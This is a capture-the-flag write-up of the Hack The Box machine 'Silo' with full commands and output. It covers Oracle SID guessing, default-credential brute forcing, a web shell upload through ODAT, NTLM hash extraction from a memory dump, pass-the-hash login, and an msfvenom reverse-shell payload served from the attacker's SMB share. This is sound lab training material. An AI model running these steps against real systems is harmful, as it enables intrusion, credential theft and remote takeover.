Introduction

This is probably one of the few times I voluntarily attempted to take a crack at attacking an oracle database server. I’ve had a little experience messing around with oracle databases at work, but I can’t say I knew much or anything at all about them. This box was pretty valuable to me since I got to learn some techniques and tactics about how to attack oracle databases. Once you got over the first hurdle silo wasn’t an overly obtuse box.

Enumeration

Initial Scanning

Like with every box let’s begin with a scan of the machine Silo (10.10.10.82). I’ve started to really enjoy using HTB almot’s htbscan.py script.

# Nmap 7.70 scan initiated Sun Jun 24 11:48:59 2018 as: nmap -sV -A -v -p49158,49153,1521,80,139,49161,49160,5985,49155,135,49154,49162,47001,445 -oA nmap/open_ports 10.10.10.82 Nmap scan report for 10.10.10.82 Host is up (0.15s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49160/tcp open oracle-tns Oracle TNS listener (requires service name) 49161/tcp open msrpc Microsoft Windows RPC 49162/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%), Microsoft Windows Server 2008 SP1 (93%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.074 days (since Sun Jun 24 10:05:06 2018) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -1s, deviation: 0s, median: -1s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2018-06-24 11:51:05 |_ start_date: 2018-06-24 10:05:23 TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 155.91 ms 10.10.14.1 2 154.66 ms 10.10.10.82 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jun 24 11:51:27 2018 -- 1 IP address (1 host up) scanned in 148.15 seconds

We see some interesting services listening right off the back that will be interesting to investigate, which includes an Oracle TNS Listener (oracle database), SMB on port 445, and a web service.

Enumeration

Enumerating IIS - Port 80

We attempt to discover hidden directories or content, but that comes up with nothing valuable.

root@dastinia:~/htb/silo# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.82 -x asp,aspx -s 200,204,301,302,307,403 -t 100 | tee gobuster_silo Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.82/ [+] Threads : 100 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 301,302,307,403,200,204 [+] Extensions : .asp,.aspx =====================================================

Enumerating Oracle DB - Port 1521

I wrote quick ODAT Installation tutorial a few days prior since some people were having issues installing ODAT on kali.

ODAT is an open source penetration testing tool targeted at attacking, and auditing the security of Oracle Database servers.

After I read up on some Oracle Database attacking methodologies:

[1] - https://www.slideshare.net/martintoshev/oracle-database-12c-attack-vectors

[2] - https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/

[3] - http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf

[4] - http://pentestdiary.blogspot.com/2017/08/oracle-database-penetration-testing.html

The general idea methodology that I took away from it was that we needed to:

Enumerate Oracle Database Version Discover SIDs (Basically oracles version a unique ‘database instance’) obtain a user account (likely through bruteforcing) Exploitation / privesc as needed. Repeat

From our Nmap scan we already know that the oracle database is running version 11.2.0.2.0

We can use ODAT’s siguesser to discover well

root@dastinia:/opt/odat# ./odat.py sidguesser -s 10.10.10.82 [1] (10.10.10.82:1521): Searching valid SIDs [1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server [+] 'SAMPLE' is a valid SID. Continue... [+] 'SCAN4' is a valid SID. Continue... [+] 'XE' is a valid SID. Continue... [+] 'XEXDB' is a valid SID. Continue... 100% |###################################################################################################################################################################################################################################################################################################| Time: 00:10:55 [1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521) 100% |###################################################################################################################################################################################################################################################################################################| Time: 00:00:12 [1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521) [+] 'XE' is a valid SID. Continue... 100% |###################################################################################################################################################################################################################################################################################################| Time: 00:07:31 [+] SIDs found on the 10.10.10.82:1521 server: SAMPLE,SCAN4,XE,XEXDB

We can use the metasploit module msf > use admin/oracle/oracle_login to bruteforce SIDS

msf > use admin/oracle/oracle_login msf auxiliary(admin/oracle/oracle_login) > msf auxiliary(admin/oracle/oracle_login) > options Module options (auxiliary/admin/oracle/oracle_login): Name Current Setting Required Description ---- --------------- -------- ----------- CSVFILE /usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv no The file that contains a list of default accounts. RHOST yes The Oracle host. RPORT 1521 yes The TNS port. SID ORCL yes The sid to authenticate with. msf auxiliary(admin/oracle/oracle_login) > set RHOST 10.10.10.82 RHOST => 10.10.10.82 msf auxiliary(admin/oracle/oracle_login) > set SID XE SID => XE msf auxiliary(admin/oracle/oracle_login) > run -j [*] Auxiliary module running as background job 0. [*] Starting brute force on 10.10.10.82:1521... [+] Found user/pass of: scott/tiger on 10.10.10.82 with sid XE [*] Auxiliary module execution completed

You will discover that there is a valid user account for scott:tiger

We also discover that we can connect to the database as SYSDBA .

failed connection as sysoper

root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysoper SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:14:55 2018 Copyright (c) 1982, 2014, Oracle. All rights reserved. ERROR: ORA-01031: insufficient privileges Enter user-name:

connecting as sysdba

root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysdba SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:15:23 2018 Copyright (c) 1982, 2014, Oracle. All rights reserved. Connected to: Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production SQL>

Exploitation

From reading over the modules there seemed to be a few modules we could attempt to leverage for code execution, or arbitrary file upload/read.

The ODAT developer was extremely nice to provide a wiki of all the modules, and some examples:

utlfile - Allows us to upload/download files from our local machine to the remote machine

externaltabe - allows us to execute a binary with the priviledges of the Oracle database server (only if the binary is stored on the server)

ctxsys - Read file from the local server

dbmsadvisor - upload file to the local server

So some attack paths we can take:

Since a web service is running on the box we can upload a web shell (aspx) to interact with the server Upload binary payload like something generated with msfvenom, and execute it. Read potentially sensitive files which we can use to attempt to utilize for further privilege escalation.

I used the first method since we will end up discovering that the oracle database was running with system privileges.

I used the following aspx web shell, and uploaded to the well-known default IIS web root directory C:\inetpub\wwwroot .

root@dastinia:/opt/odat# ./odat.py utlfile -s 10.10.10.82 -d XE -U SCOTT -P tiger --putFile 'C:\inetpub\wwwroot\' 'shell.aspx' /root/htb/silo/silo_shell.aspx --sysdba [1] (10.10.10.82:1521): Put the /root/htb/silo/silo_shell.aspx local file in the C:\inetpub\wwwroot\ folder like shell.aspx on the 10.10.10.82 server [+] The /root/htb/silo/silo_shell.aspx file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the shell.aspx file

Analyzing Memory Dump with Volatility

We are given a dropbox link, and a password to access what appears to be a memory dump.

Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested): Dropbox link provided to vendor (and password under separate cover). Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 link password: £%Hm8646uC$

Let’s begin analyzing this memory dump by inspecting the processes

root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 pslist RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa Volatility Foundation Volatility Framework 2.6 Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit ------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------ 0xffffe00000089940 System 4 0 84 0 ------ 0 2018-01-05 22:17:14 UTC+0000 0xffffe00000c9c100 smss.exe 208 4 3 0 ------ 0 2018-01-05 22:17:14 UTC+0000 0xffffe000034f54c0 csrss.exe 324 316 10 0 0 0 2018-01-05 22:17:15 UTC+0000 0xffffe000034ec380 csrss.exe 396 388 10 0 1 0 2018-01-05 22:17:16 UTC+0000 0xffffe000034ac940 wininit.exe 404 316 4 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00002fee080 winlogon.exe 448 388 5 0 1 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003550940 services.exe 492 404 10 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003ed4080 lsass.exe 500 404 6 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003f22500 svchost.exe 560 492 15 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003f39940 svchost.exe 604 492 15 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003f6f680 dwm.exe 688 448 9 0 1 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003f68940 vmacthlp.exe 708 492 2 0 0 0 2018-01-05 22:17:16 UTC+0000 0xffffe00003fb9080 svchost.exe 764 492 16 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00003fcc940 svchost.exe 800 492 63 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00003fe3940 svchost.exe 832 492 20 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004e267c0 svchost.exe 920 492 25 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004e8d940 svchost.exe 340 492 16 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004f2e940 spoolsv.exe 308 492 13 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004f5c940 svchost.exe 1052 492 11 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004f84940 oracle.exe 1088 492 30 0 0 0 2018-01-05 22:17:17 UTC+0000 0xffffe00004fe93c0 OraClrAgnt.exe 1192 492 2 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe00004fef940 TNSLSNR.EXE 1208 492 5 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe00004ff0300 agtctl.exe 1216 1192 0 -------- 0 0 2018-01-05 22:17:18 UTC+0000 2018-01-05 22:17:18 UTC+0000 0xffffe00004ff3940 agtctl.exe 1264 1192 0 -------- 0 0 2018-01-05 22:17:18 UTC+0000 2018-01-05 22:17:18 UTC+0000 0xffffe00004ffc440 svchost.exe 1272 492 4 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe00004fff080 VGAuthService. 1324 492 3 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe000060568c0 agtctl.exe 1348 1192 0 -------- 0 0 2018-01-05 22:17:18 UTC+0000 2018-01-05 22:17:18 UTC+0000 0xffffe000060767c0 agtctl.exe 1388 1192 0 -------- 0 0 2018-01-05 22:17:18 UTC+0000 2018-01-05 22:17:18 UTC+0000 0xffffe0000608f780 vmtoolsd.exe 1444 492 8 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe000060a62c0 ManagementAgen 1492 492 9 0 0 0 2018-01-05 22:17:18 UTC+0000 0xffffe000060c7940 svchost.exe 1516 492 16 0 0 0 2018-01-05 22:17:19 UTC+0000 0xffffe00003051940 svchost.exe 2000 492 5 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe00003077880 TPAutoConnSvc. 1256 492 8 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe000030a1080 dllhost.exe 1432 492 21 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe000030b7940 dllhost.exe 1600 492 17 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe000030cd940 WmiPrvSE.exe 1440 560 12 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe000030cf940 msdtc.exe 2052 492 13 0 0 0 2018-01-05 22:17:27 UTC+0000 0xffffe00003117940 VSSVC.exe 2228 492 7 0 0 0 2018-01-05 22:17:29 UTC+0000 0xffffe00003149080 sppsvc.exe 2284 492 5 0 0 0 2018-01-05 22:17:29 UTC+0000 0xffffe0000315f940 SppExtComObj.E 2312 560 5 0 0 0 2018-01-05 22:17:29 UTC+0000 0xffffe000061637c0 taskhostex.exe 2368 800 7 0 1 0 2018-01-05 22:17:33 UTC+0000 0xffffe00004e00680 explorer.exe 2424 2416 56 0 1 0 2018-01-05 22:17:33 UTC+0000 0xffffe00000df34c0 ServerManager. 2732 2376 24 0 1 0 2018-01-05 22:17:35 UTC+0000 0xffffe0000301c940 TPAutoConnect. 2824 1256 3 0 1 0 2018-01-05 22:17:37 UTC+0000 0xffffe00003f698c0 conhost.exe 2832 2824 1 0 1 0 2018-01-05 22:17:37 UTC+0000 0xffffe0000136d080 vmtoolsd.exe 2992 2424 8 0 1 0 2018-01-05 22:17:45 UTC+0000 0xffffe00003224540 WmiPrvSE.exe 3056 560 19 0 0 0 2018-01-05 22:17:47 UTC+0000 0xffffe00003239940 WmiPrvSE.exe 2340 560 10 0 0 0 2018-01-05 22:17:47 UTC+0000 0xffffe0000325c940 WmiApSrv.exe 864 492 5 0 0 0 2018-01-05 22:17:48 UTC+0000 0xffffe00003203340 DumpIt.exe 2932 2424 4 0 1 0 2018-01-05 22:18:06 UTC+0000 0xffffe00003f8c940 conhost.exe 2764 2932 2 0 1 0 2018-01-05 22:18:06 UTC+0000

It looks like the forensics tool DumpIT was used to create this memory dump. Which likely means it was done with admin privileges.

We can use the hashdump volatility module to dump the hashes of the accounts stored on the system. This is the equivalent of doing a hashdump with meterpreter. We just need to get the virtual offsets of the SYSTEM & SECURITY hives using the hivelist module first. Which happen to be 0xffffc00000028000 & 0xffffc00000619000 respectively.)

root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa Volatility Foundation Volatility Framework 2.6 Virtual Physical Name ------------------ ------------------ ---- 0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat 0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS 0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve 0xffffc0000001e000 0x0000000000b65000 [no name] 0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM 0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE 0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD 0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE 0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT 0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY 0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM 0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT 0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI 0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT 0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator

tuser.dat

dumping hashes

root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000 RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa Volatility Foundation Volatility Framework 2.6 Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::

Getting System

Now we can use the hashes we dumped with a tool like pth-winexe on kali to get administrator privileges.

root@dastinia:~/Desktop# pth-winexe -U "Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::" //10.10.10.82 cmd E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH... Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami silo\administrator C:\Windows\system32> C:\Users\Administrator\Desktop>type root.txt type root.txt cd3...[redacted]....

Getting Systemv2

We can use the externaltable module to execute a binary (or command) against the system. Using a combination of impacket-smbserver + externaltable we can achieve remote code execution.

generating our payload

root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.98 LPORT=6969 -f exe > 6969.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes

Start up an impacket-smbserver

root@dastinia:/opt/serve/windows# impacket-smbserver kk kk Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed

execute our payload stored on our smb share

root@dastinia:/opt/odat# ./odat.py externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \\\\10.10.14.98\\kk 6969.exe [1] (10.10.10.82:1521): Execute the 6969.exe command stored in the \\10.10.14.98\kk path

getting system shell